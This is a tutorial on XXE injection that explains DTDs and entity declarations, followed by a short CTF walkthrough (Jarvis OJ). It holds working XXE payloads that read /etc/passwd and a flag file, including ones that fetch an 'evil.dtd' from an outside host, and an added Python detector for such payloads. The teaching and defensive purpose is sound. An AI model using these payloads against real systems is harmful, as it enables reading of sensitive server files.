XXE vulnerabilities
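XML basics
XXE vulnerabilities
XXE stands for XML External Entity, that is, an XML external entity injection attack. The vulnerability is the security problem that arises when unsafe external entity data is processed.
DTD
DTD stands for document type definition; it defines the legal building blocks of an XML document.
It uses a set of legal elements to define the structure of the document. A DTD can be declared inline in the XML document (internal declaration) or used as an external reference.
Internal DTD declaration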
<!DOCTYPE root-element [element-declarations]>
<?xml version="1.0" encoding="UTF-8"?>
<!-- DTD -->
<!DOCTYPE note [
<!-- define the elements -->
<!ELEMENT note (to,from,login)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT login (#PCDATA)>
]>
<note>
<to> tony </to>
<from> anmi </from>
<login>123</login>
</note>
Referencing an external DTD:
<!DOCTYPE root-element SYSTEM "filename">
<!DOCTYPE root-element PUBLIC "public_ID" "filename">
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
This is the "note.dtd" file that contains the DTD:
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
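Entity types in a DTD are generally divided into internal entities and external entities; a finer division is into general entities and parameter entities.
Parameter entities (declared with %, referenced with %; declared in the DTD, referenced in the DTD)
Other entities (declared directly with the entity name, referenced with &; declared in the DTD, referenced in the XML)
Internal entity:
<!ENTITY entity-name "entity-content">
External entity:
<!ENTITY entity-name SYSTEM "URI">
<!ENTITY entity-name PUBLIC "public_ID" "URI">
Parameter entity:
<!ENTITY % entity-name "entity-content">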
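How to tell whether a site has an XXE vulnerability
The most direct method is to capture the traffic with Burp, then modify the HTTP request method, the Content-Type header field and so on, and look at the response to see whether the application parsed the content that was sent. If it did, an XXE vulnerability may be present.
Ways to construct an external entity injection
1. Directly through an external entity declaration in the DTD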
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE NPFS[
<!ENTITY npfs SYSTEM "file:///home/ctf/flag.txt">]>
<something>&npfs;</something>
2. Through a DTD that pulls in an external DTD document, which in turn introduces the external entity declaration
XML content:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % d SYSTEM "http://www.123.com/evil.dtd">
%d;
]>
<aaa>&b;</aaa>
Content of the DTD file (evil.dtd):
<!ENTITY b SYSTEM "file:///etc/passwd">
3. Introducing the external entity declaration through an external DTD declaration
XML content:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a SYSTEM "http://www.123.com/evil.dtd">
<a>&b;</a>
Content of the DTD file (evil.dtd):
<!ENTITY b SYSTEM "file:///etc/passwd">
Also, different programs support different protocols.
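Added example (not part of the original post): a Python pre-parse check, built on the standard-library expat bindings, that flags each of the three construction methods above without resolving any external reference. The function names and the sample documents with placeholder URIs are assumptions made for this illustration.

```python
from xml.parsers import expat


def xxe_findings(xml_bytes):
    """List DTD features in xml_bytes that pull in external content.

    Nothing is fetched: no ExternalEntityRefHandler is installed and
    parameter-entity parsing stays at expat's default (disabled).
    """
    findings = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:  # <!DOCTYPE a SYSTEM "..."> (method 3)
            findings.append(("external-dtd", system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:  # <!ENTITY [%] x SYSTEM "..."> (methods 1, 2)
            kind = "external-parameter-entity" if is_param else "external-entity"
            findings.append((kind, system_id))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:  # malformed input is rejected as well
        findings.append(("parse-error", str(exc)))
    return findings


def allow_document(xml_bytes):
    """Example policy: accept only documents that produce no findings."""
    return not xxe_findings(xml_bytes)


# Constructed samples with placeholder URIs, one per method described above.
SAMPLES = {
    "method1": b'<!DOCTYPE r [<!ENTITY e SYSTEM "file:///placeholder/secret.txt">]><r>&e;</r>',
    "method2": b'<!DOCTYPE r [<!ENTITY % d SYSTEM "http://dtd.example/x.dtd"> %d;]><r>&b;</r>',
    "method3": b'<!DOCTYPE r SYSTEM "http://dtd.example/x.dtd"><r>&b;</r>',
    "benign": b"<note><to>tony</to><from>anmi</from><login>123</login></note>",
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        print(label, allow_document(doc), xxe_findings(doc))
```

Running such a check before the application's real parser sees the request body lets the three shapes be rejected and logged by kind, whatever Content-Type the client claimed.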
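(Jarvis OJ) API call
go, then capture the request
You can see that the Content-Type used here is json.
JSON (JavaScript Object Notation) is a lightweight data-interchange format. It came about because the details of integrating XML into HTML were implemented differently across browsers.
JSON has these structural forms: the key/value-pair form and the array form (as shown by arrow 2).
The challenge hint also says: find a way to obtain the flag value in /home/ctf/flag.txt on the target machine.
So this is judged to be an XXE vulnerability.
Change the JSON to XML and construct an external reference.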
References:
https://xz.aliyun.com/t/3357#toc-22
https://p0rz9.github.io/2019/02/27/xxe/#
https://security.tencent.com/index.php/blog/msg/69